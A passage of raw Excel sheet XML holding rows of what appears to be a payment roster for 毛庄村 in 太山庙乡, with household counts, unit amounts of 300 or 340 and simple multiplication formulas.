      <c r="J2120" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2120" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2121" ht="23" customHeight="1" spans="1:11">
      <c r="A2121" s="13" t="s">
        <v>5613</v>
      </c>
      <c r="B2121" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2121" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2121" s="14" t="s">
        <v>5614</v>
      </c>
      <c r="E2121" s="14" t="s">
        <v>3589</v>
      </c>
      <c r="F2121" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2121" s="14">
        <v>1</v>
      </c>
      <c r="H2121" s="14">
        <v>340</v>
      </c>
      <c r="I2121" s="14">
        <f t="shared" si="105"/>
        <v>340</v>
      </c>
      <c r="J2121" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2121" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2122" ht="23" customHeight="1" spans="1:11">
      <c r="A2122" s="13" t="s">
        <v>5615</v>
      </c>
      <c r="B2122" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2122" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2122" s="14" t="s">
        <v>5616</v>
      </c>
      <c r="E2122" s="14" t="s">
        <v>5617</v>
      </c>
      <c r="F2122" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2122" s="14">
        <v>1</v>
      </c>
      <c r="H2122" s="14">
        <v>340</v>
      </c>
      <c r="I2122" s="14">
        <f t="shared" si="105"/>
        <v>340</v>
      </c>
      <c r="J2122" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2122" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2123" ht="23" customHeight="1" spans="1:11">
      <c r="A2123" s="13" t="s">
        <v>5618</v>
      </c>
      <c r="B2123" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2123" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2123" s="14" t="s">
        <v>5619</v>
      </c>
      <c r="E2123" s="14" t="s">
        <v>5620</v>
      </c>
      <c r="F2123" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2123" s="14">
        <v>1</v>
      </c>
      <c r="H2123" s="14">
        <v>340</v>
      </c>
      <c r="I2123" s="14">
        <f t="shared" si="105"/>
        <v>340</v>
      </c>
      <c r="J2123" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2123" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2124" ht="23" customHeight="1" spans="1:11">
      <c r="A2124" s="13" t="s">
        <v>5621</v>
      </c>
      <c r="B2124" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2124" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2124" s="14" t="s">
        <v>5622</v>
      </c>
      <c r="E2124" s="14" t="s">
        <v>5623</v>
      </c>
      <c r="F2124" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2124" s="14">
        <v>1</v>
      </c>
      <c r="H2124" s="14">
        <v>340</v>
      </c>
      <c r="I2124" s="14">
        <f t="shared" si="105"/>
        <v>340</v>
      </c>
      <c r="J2124" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2124" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2125" ht="23" customHeight="1" spans="1:11">
      <c r="A2125" s="13" t="s">
        <v>5624</v>
      </c>
      <c r="B2125" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2125" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2125" s="14" t="s">
        <v>5625</v>
      </c>
      <c r="E2125" s="14" t="s">
        <v>3589</v>
      </c>
      <c r="F2125" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2125" s="14">
        <v>1</v>
      </c>
      <c r="H2125" s="14">
        <v>340</v>
      </c>
      <c r="I2125" s="14">
        <f t="shared" si="105"/>
        <v>340</v>
      </c>
      <c r="J2125" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2125" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2126" ht="23" customHeight="1" spans="1:11">
      <c r="A2126" s="13" t="s">
        <v>5626</v>
      </c>
      <c r="B2126" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2126" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2126" s="14" t="s">
        <v>5627</v>
      </c>
      <c r="E2126" s="14" t="s">
        <v>5628</v>
      </c>
      <c r="F2126" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2126" s="14">
        <v>2</v>
      </c>
      <c r="H2126" s="14">
        <v>300</v>
      </c>
      <c r="I2126" s="14">
        <f t="shared" si="105"/>
        <v>600</v>
      </c>
      <c r="J2126" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2126" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2127" ht="23" customHeight="1" spans="1:11">
      <c r="A2127" s="13" t="s">
        <v>5629</v>
      </c>
      <c r="B2127" s="14" t="str">
        <f>B2126</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2127" s="14" t="str">
        <f>C2126</f>
        <v>毛庄村</v>
      </c>
      <c r="D2127" s="13" t="s">
        <v>5630</v>
      </c>
      <c r="E2127" s="13" t="s">
        <v>5631</v>
      </c>
      <c r="F2127" s="14">
        <f>F2126</f>
        <v>4113210704</v>
      </c>
      <c r="G2127" s="14"/>
      <c r="H2127" s="14"/>
      <c r="I2127" s="14"/>
      <c r="J2127" s="14"/>
      <c r="K2127" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2128" ht="23" customHeight="1" spans="1:11">
      <c r="A2128" s="13" t="s">
        <v>5632</v>
      </c>
      <c r="B2128" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2128" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2128" s="14" t="s">
        <v>5633</v>
      </c>
      <c r="E2128" s="14" t="s">
        <v>2879</v>
      </c>
      <c r="F2128" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2128" s="14">
        <v>1</v>
      </c>
      <c r="H2128" s="14">
        <v>340</v>
      </c>
      <c r="I2128" s="14">
        <f>H2128*G2128</f>
        <v>340</v>
      </c>
      <c r="J2128" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2128" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2129" ht="23" customHeight="1" spans="1:11">
      <c r="A2129" s="13" t="s">
        <v>5634</v>
      </c>
      <c r="B2129" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2129" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2129" s="14" t="s">
        <v>5635</v>
      </c>
      <c r="E2129" s="14" t="s">
        <v>5636</v>
      </c>
      <c r="F2129" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2129" s="14">
        <v>1</v>
      </c>
      <c r="H2129" s="14">
        <v>340</v>
      </c>
      <c r="I2129" s="14">
        <f>H2129*G2129</f>
        <v>340</v>
      </c>
      <c r="J2129" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2129" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2130" ht="23" customHeight="1" spans="1:11">
      <c r="A2130" s="13" t="s">
        <v>5637</v>
      </c>
      <c r="B2130" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2130" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2130" s="14" t="s">
        <v>5638</v>
      </c>
      <c r="E2130" s="14" t="s">
        <v>5639</v>
      </c>
      <c r="F2130" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2130" s="14">
        <v>2</v>
      </c>
      <c r="H2130" s="14">
        <v>300</v>
      </c>
      <c r="I2130" s="14">
        <f>H2130*G2130</f>
        <v>600</v>
      </c>
      <c r="J2130" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2130" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2131" ht="23" customHeight="1" spans="1:11">
      <c r="A2131" s="13" t="s">
        <v>5640</v>
      </c>
      <c r="B2131" s="14" t="str">
        <f>B2130</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2131" s="14" t="str">
        <f>C2130</f>
        <v>毛庄村</v>
      </c>
      <c r="D2131" s="13" t="s">
        <v>5641</v>
      </c>
      <c r="E2131" s="13" t="s">
        <v>5642</v>
      </c>
      <c r="F2131" s="14">
        <f>F2130</f>
        <v>4113210704</v>
      </c>
      <c r="G2131" s="14"/>
      <c r="H2131" s="14"/>
      <c r="I2131" s="14"/>
      <c r="J2131" s="14"/>
      <c r="K2131" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2132" ht="23" customHeight="1" spans="1:11">
      <c r="A2132" s="13" t="s">
        <v>5643</v>
      </c>
      <c r="B2132" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2132" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2132" s="14" t="s">
        <v>5644</v>
      </c>
      <c r="E2132" s="14" t="s">
        <v>5583</v>
      </c>
      <c r="F2132" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2132" s="14">
        <v>2</v>
      </c>
      <c r="H2132" s="14">
        <v>320</v>
      </c>
      <c r="I2132" s="14">
        <f>H2132*G2132</f>
        <v>640</v>
      </c>
      <c r="J2132" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2132" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2133" ht="23" customHeight="1" spans="1:11">
      <c r="A2133" s="13" t="s">
        <v>5645</v>
      </c>
      <c r="B2133" s="14" t="str">
        <f>B2132</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2133" s="14" t="str">
        <f>C2132</f>
        <v>毛庄村</v>
      </c>
      <c r="D2133" s="13" t="s">
        <v>5646</v>
      </c>
      <c r="E2133" s="13" t="s">
        <v>5647</v>
      </c>
      <c r="F2133" s="14">
        <f>F2132</f>
        <v>4113210704</v>
      </c>
      <c r="G2133" s="14"/>
      <c r="H2133" s="14"/>
      <c r="I2133" s="14"/>
      <c r="J2133" s="14"/>
      <c r="K2133" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2134" ht="23" customHeight="1" spans="1:11">
      <c r="A2134" s="13" t="s">
        <v>5648</v>
      </c>
      <c r="B2134" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2134" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2134" s="14" t="s">
        <v>5649</v>
      </c>
      <c r="E2134" s="14" t="s">
        <v>5650</v>
      </c>
      <c r="F2134" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2134" s="14">
        <v>2</v>
      </c>
      <c r="H2134" s="14">
        <v>300</v>
      </c>
      <c r="I2134" s="14">
        <f>H2134*G2134</f>
        <v>600</v>
      </c>
      <c r="J2134" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2134" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2135" ht="23" customHeight="1" spans="1:11">
      <c r="A2135" s="13" t="s">
        <v>5651</v>
      </c>
      <c r="B2135" s="14" t="str">
        <f>B2134</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2135" s="14" t="str">
        <f>C2134</f>
        <v>毛庄村</v>
      </c>
      <c r="D2135" s="13" t="s">
        <v>5652</v>
      </c>
      <c r="E2135" s="13" t="s">
        <v>5653</v>
      </c>
      <c r="F2135" s="14">
        <f>F2134</f>
        <v>4113210704</v>
      </c>
      <c r="G2135" s="14"/>
      <c r="H2135" s="14"/>
      <c r="I2135" s="14"/>
      <c r="J2135" s="14"/>
      <c r="K2135" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2136" ht="23" customHeight="1" spans="1:11">
      <c r="A2136" s="13" t="s">
        <v>5654</v>
      </c>
      <c r="B2136" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2136" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2136" s="14" t="s">
        <v>5655</v>
      </c>
      <c r="E2136" s="14" t="s">
        <v>5636</v>
      </c>
      <c r="F2136" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2136" s="14">
        <v>1</v>
      </c>
      <c r="H2136" s="14">
        <v>340</v>
      </c>
      <c r="I2136" s="14">
        <f>H2136*G2136</f>
        <v>340</v>
      </c>
      <c r="J2136" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2136" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2137" ht="23" customHeight="1" spans="1:11">
      <c r="A2137" s="13" t="s">
        <v>5656</v>
      </c>
      <c r="B2137" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2137" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2137" s="14" t="s">
        <v>5657</v>
      </c>
      <c r="E2137" s="14" t="s">
        <v>5623</v>
      </c>
      <c r="F2137" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2137" s="14">
        <v>2</v>
      </c>
      <c r="H2137" s="14">
        <v>300</v>
      </c>
      <c r="I2137" s="14">
        <f>H2137*G2137</f>
        <v>600</v>
      </c>
      <c r="J2137" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2137" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2138" ht="23" customHeight="1" spans="1:11">
      <c r="A2138" s="13" t="s">
        <v>5658</v>
      </c>
      <c r="B2138" s="14" t="str">
        <f>B2137</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2138" s="14" t="str">
        <f>C2137</f>
        <v>毛庄村</v>
      </c>
      <c r="D2138" s="13" t="s">
        <v>5659</v>
      </c>
      <c r="E2138" s="20" t="s">
        <v>5605</v>
      </c>
      <c r="F2138" s="14">
        <f>F2137</f>
        <v>4113210704</v>
      </c>
      <c r="G2138" s="14"/>
      <c r="H2138" s="14"/>
      <c r="I2138" s="14"/>
      <c r="J2138" s="14"/>
      <c r="K2138" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2139" ht="23" customHeight="1" spans="1:11">
      <c r="A2139" s="13" t="s">
        <v>5660</v>
      </c>
      <c r="B2139" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2139" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2139" s="14" t="s">
        <v>5661</v>
      </c>
      <c r="E2139" s="14" t="s">
        <v>5662</v>
      </c>
      <c r="F2139" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2139" s="14">
        <v>1</v>
      </c>
      <c r="H2139" s="14">
        <v>340</v>
      </c>
      <c r="I2139" s="14">
        <f>H2139*G2139</f>
        <v>340</v>
      </c>
      <c r="J2139" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2139" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2140" ht="23" customHeight="1" spans="1:11">
      <c r="A2140" s="13" t="s">
        <v>5663</v>
      </c>
      <c r="B2140" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2140" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2140" s="14" t="s">
        <v>5664</v>
      </c>
      <c r="E2140" s="14" t="s">
        <v>5665</v>
      </c>
      <c r="F2140" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2140" s="14">
        <v>2</v>
      </c>
      <c r="H2140" s="14">
        <v>300</v>
      </c>
      <c r="I2140" s="14">
        <f>H2140*G2140</f>
        <v>600</v>
      </c>
      <c r="J2140" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2140" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2141" ht="23" customHeight="1" spans="1:11">
      <c r="A2141" s="13" t="s">
        <v>5666</v>
      </c>
      <c r="B2141" s="14" t="str">
        <f>B2140</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2141" s="14" t="str">
        <f>C2140</f>
        <v>毛庄村</v>
      </c>
      <c r="D2141" s="13" t="s">
        <v>5667</v>
      </c>
      <c r="E2141" s="13" t="s">
        <v>5668</v>
      </c>
      <c r="F2141" s="14">
        <f>F2140</f>
        <v>4113210704</v>
      </c>
      <c r="G2141" s="14"/>
      <c r="H2141" s="14"/>
      <c r="I2141" s="14"/>
      <c r="J2141" s="14"/>
      <c r="K2141" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2142" ht="23" customHeight="1" spans="1:11">
      <c r="A2142" s="13" t="s">
        <v>5669</v>
      </c>
      <c r="B2142" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2142" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2142" s="14" t="s">
        <v>5670</v>
      </c>
      <c r="E2142" s="14" t="s">
        <v>5600</v>
      </c>
      <c r="F2142" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2142" s="14">
        <v>1</v>
      </c>
      <c r="H2142" s="14">
        <v>340</v>
      </c>
      <c r="I2142" s="14">
        <f>H2142*G2142</f>
        <v>340</v>
      </c>
      <c r="J2142" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2142" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2143" ht="23" customHeight="1" spans="1:11">
      <c r="A2143" s="13" t="s">
        <v>5671</v>
      </c>
      <c r="B2143" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2143" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2143" s="14" t="s">
        <v>5672</v>
      </c>
      <c r="E2143" s="14" t="s">
        <v>5639</v>
      </c>
      <c r="F2143" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2143" s="14">
        <v>1</v>
      </c>
      <c r="H2143" s="14">
        <v>340</v>
      </c>
      <c r="I2143" s="14">
        <f>H2143*G2143</f>
        <v>340</v>
      </c>
      <c r="J2143" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2143" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2144" ht="23" customHeight="1" spans="1:11">
      <c r="A2144" s="13" t="s">
        <v>5673</v>
      </c>
      <c r="B2144" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2144" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2144" s="14" t="s">
        <v>5674</v>
      </c>
      <c r="E2144" s="14" t="s">
        <v>5675</v>
      </c>
      <c r="F2144" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2144" s="14">
        <v>2</v>
      </c>
      <c r="H2144" s="14">
        <v>300</v>
      </c>
      <c r="I2144" s="14">
        <f>H2144*G2144</f>
        <v>600</v>
      </c>
      <c r="J2144" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2144" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2145" ht="23" customHeight="1" spans="1:11">
      <c r="A2145" s="13" t="s">
        <v>5676</v>
      </c>
      <c r="B2145" s="14" t="str">
        <f>B2144</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2145" s="14" t="str">
        <f>C2144</f>
        <v>毛庄村</v>
      </c>
      <c r="D2145" s="13" t="s">
        <v>5677</v>
      </c>
      <c r="E2145" s="13" t="s">
        <v>3633</v>
      </c>
      <c r="F2145" s="14">
        <f>F2144</f>
        <v>4113210704</v>
      </c>
      <c r="G2145" s="14"/>
      <c r="H2145" s="14"/>
      <c r="I2145" s="14"/>
      <c r="J2145" s="14"/>
      <c r="K2145" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2146" ht="23" customHeight="1" spans="1:11">
      <c r="A2146" s="13" t="s">
        <v>5678</v>
      </c>
      <c r="B2146" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2146" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2146" s="14" t="s">
        <v>5679</v>
      </c>
      <c r="E2146" s="14" t="s">
        <v>5610</v>
      </c>
      <c r="F2146" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2146" s="14">
        <v>1</v>
      </c>
      <c r="H2146" s="14">
        <v>340</v>
      </c>
      <c r="I2146" s="14">
        <f>H2146*G2146</f>
        <v>340</v>
      </c>
      <c r="J2146" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2146" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2147" ht="23" customHeight="1" spans="1:11">
      <c r="A2147" s="13" t="s">
        <v>5680</v>
      </c>
      <c r="B2147" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2147" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2147" s="14" t="s">
        <v>5681</v>
      </c>
      <c r="E2147" s="14" t="s">
        <v>5682</v>
      </c>
      <c r="F2147" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2147" s="14">
        <v>1</v>
      </c>
      <c r="H2147" s="14">
        <v>340</v>
      </c>
      <c r="I2147" s="14">
        <f>H2147*G2147</f>
        <v>340</v>
      </c>
      <c r="J2147" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2147" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2148" ht="23" customHeight="1" spans="1:11">
      <c r="A2148" s="13" t="s">
        <v>5683</v>
      </c>
      <c r="B2148" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2148" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2148" s="14" t="s">
        <v>5684</v>
      </c>
      <c r="E2148" s="14" t="s">
        <v>5685</v>
      </c>
      <c r="F2148" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2148" s="14">
        <v>2</v>
      </c>
      <c r="H2148" s="14">
        <v>300</v>
      </c>
      <c r="I2148" s="14">
        <f>H2148*G2148</f>
        <v>600</v>
      </c>
      <c r="J2148" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2148" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2149" ht="23" customHeight="1" spans="1:11">
      <c r="A2149" s="13" t="s">
        <v>5686</v>
      </c>
      <c r="B2149" s="14" t="str">
        <f>B2148</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2149" s="14" t="str">
        <f>C2148</f>
        <v>毛庄村</v>
      </c>
      <c r="D2149" s="13" t="s">
        <v>5687</v>
      </c>
      <c r="E2149" s="13" t="s">
        <v>5688</v>
      </c>
      <c r="F2149" s="14">
        <f>F2148</f>
        <v>4113210704</v>
      </c>
      <c r="G2149" s="14"/>
      <c r="H2149" s="14"/>
      <c r="I2149" s="14"/>
      <c r="J2149" s="14"/>
      <c r="K2149" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2150" ht="23" customHeight="1" spans="1:11">
      <c r="A2150" s="13" t="s">
        <v>5689</v>
      </c>
      <c r="B2150" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2150" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2150" s="14" t="s">
        <v>5690</v>
      </c>
      <c r="E2150" s="14" t="s">
        <v>5691</v>
      </c>
      <c r="F2150" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2150" s="14">
        <v>1</v>
      </c>
      <c r="H2150" s="14">
        <v>340</v>
      </c>
      <c r="I2150" s="14">
        <f t="shared" ref="I2150:I2155" si="106">H2150*G2150</f>
        <v>340</v>
      </c>
      <c r="J2150" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2150" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2151" ht="23" customHeight="1" spans="1:11">
      <c r="A2151" s="13" t="s">
        <v>5692</v>
      </c>
      <c r="B2151" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2151" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2151" s="14" t="s">
        <v>5693</v>
      </c>
      <c r="E2151" s="14" t="s">
        <v>5694</v>
      </c>
      <c r="F2151" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2151" s="14">
        <v>1</v>
      </c>
      <c r="H2151" s="14">
        <v>340</v>
      </c>
      <c r="I2151" s="14">
        <f t="shared" si="106"/>
        <v>340</v>
      </c>
      <c r="J2151" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2151" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2152" ht="23" customHeight="1" spans="1:11">
      <c r="A2152" s="13" t="s">
        <v>5695</v>
      </c>
      <c r="B2152" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2152" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2152" s="14" t="s">
        <v>5696</v>
      </c>
      <c r="E2152" s="14" t="s">
        <v>5202</v>
      </c>
      <c r="F2152" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2152" s="14">
        <v>1</v>
      </c>
      <c r="H2152" s="14">
        <v>340</v>
      </c>
      <c r="I2152" s="14">
        <f t="shared" si="106"/>
        <v>340</v>
      </c>
      <c r="J2152" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2152" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2153" ht="23" customHeight="1" spans="1:11">
      <c r="A2153" s="13" t="s">
        <v>5697</v>
      </c>
      <c r="B2153" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2153" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2153" s="14" t="s">
        <v>5698</v>
      </c>
      <c r="E2153" s="14" t="s">
        <v>5591</v>
      </c>
      <c r="F2153" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2153" s="14">
        <v>1</v>
      </c>
      <c r="H2153" s="14">
        <v>340</v>
      </c>
      <c r="I2153" s="14">
        <f t="shared" si="106"/>
        <v>340</v>
      </c>
      <c r="J2153" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2153" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2154" ht="23" customHeight="1" spans="1:11">
      <c r="A2154" s="13" t="s">
        <v>5699</v>
      </c>
      <c r="B2154" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2154" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2154" s="14" t="s">
        <v>5700</v>
      </c>
      <c r="E2154" s="14" t="s">
        <v>5701</v>
      </c>
      <c r="F2154" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2154" s="14">
        <v>1</v>
      </c>
      <c r="H2154" s="14">
        <v>340</v>
      </c>
      <c r="I2154" s="14">
        <f t="shared" si="106"/>
        <v>340</v>
      </c>
      <c r="J2154" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2154" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2155" ht="23" customHeight="1" spans="1:11">
      <c r="A2155" s="13" t="s">
        <v>5702</v>
      </c>
      <c r="B2155" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2155" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2155" s="14" t="s">
        <v>5703</v>
      </c>
      <c r="E2155" s="14" t="s">
        <v>5620</v>
      </c>
      <c r="F2155" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2155" s="14">
        <v>2</v>
      </c>
      <c r="H2155" s="14">
        <v>300</v>
      </c>
      <c r="I2155" s="14">
        <f t="shared" si="106"/>
        <v>600</v>
      </c>
      <c r="J2155" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2155" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2156" ht="23" customHeight="1" spans="1:11">
      <c r="A2156" s="13" t="s">
        <v>5704</v>
      </c>
      <c r="B2156" s="14" t="str">
        <f>B2155</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2156" s="14" t="str">
        <f>C2155</f>
        <v>毛庄村</v>
      </c>
      <c r="D2156" s="13" t="s">
        <v>5705</v>
      </c>
      <c r="E2156" s="13" t="s">
        <v>5675</v>
      </c>
      <c r="F2156" s="14">
        <f>F2155</f>
        <v>4113210704</v>
      </c>
      <c r="G2156" s="14"/>
      <c r="H2156" s="14"/>
      <c r="I2156" s="14"/>
      <c r="J2156" s="14"/>
      <c r="K2156" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2157" ht="23" customHeight="1" spans="1:11">
      <c r="A2157" s="13" t="s">
        <v>5706</v>
      </c>
      <c r="B2157" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2157" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2157" s="14" t="s">
        <v>5707</v>
      </c>
      <c r="E2157" s="14" t="s">
        <v>5694</v>
      </c>
      <c r="F2157" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2157" s="14">
        <v>1</v>
      </c>
      <c r="H2157" s="14">
        <v>340</v>
      </c>
      <c r="I2157" s="14">
        <f>H2157*G2157</f>
        <v>340</v>
      </c>
      <c r="J2157" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2157" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2158" ht="23" customHeight="1" spans="1:11">
      <c r="A2158" s="13" t="s">
        <v>5708</v>
      </c>
      <c r="B2158" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2158" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2158" s="14" t="s">
        <v>5709</v>
      </c>
      <c r="E2158" s="14" t="s">
        <v>5710</v>
      </c>
      <c r="F2158" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2158" s="14">
        <v>1</v>
      </c>
      <c r="H2158" s="14">
        <v>340</v>
      </c>
      <c r="I2158" s="14">
        <f>H2158*G2158</f>
        <v>340</v>
      </c>
      <c r="J2158" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2158" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2159" ht="23" customHeight="1" spans="1:11">
      <c r="A2159" s="13" t="s">
        <v>5711</v>
      </c>
      <c r="B2159" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2159" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="D2159" s="14" t="s">
        <v>5712</v>
      </c>
      <c r="E2159" s="14" t="s">
        <v>5694</v>
      </c>
      <c r="F2159" s="14" t="s">
        <v>5713</v>
      </c>
      <c r="G2159" s="14">
        <v>1</v>
      </c>
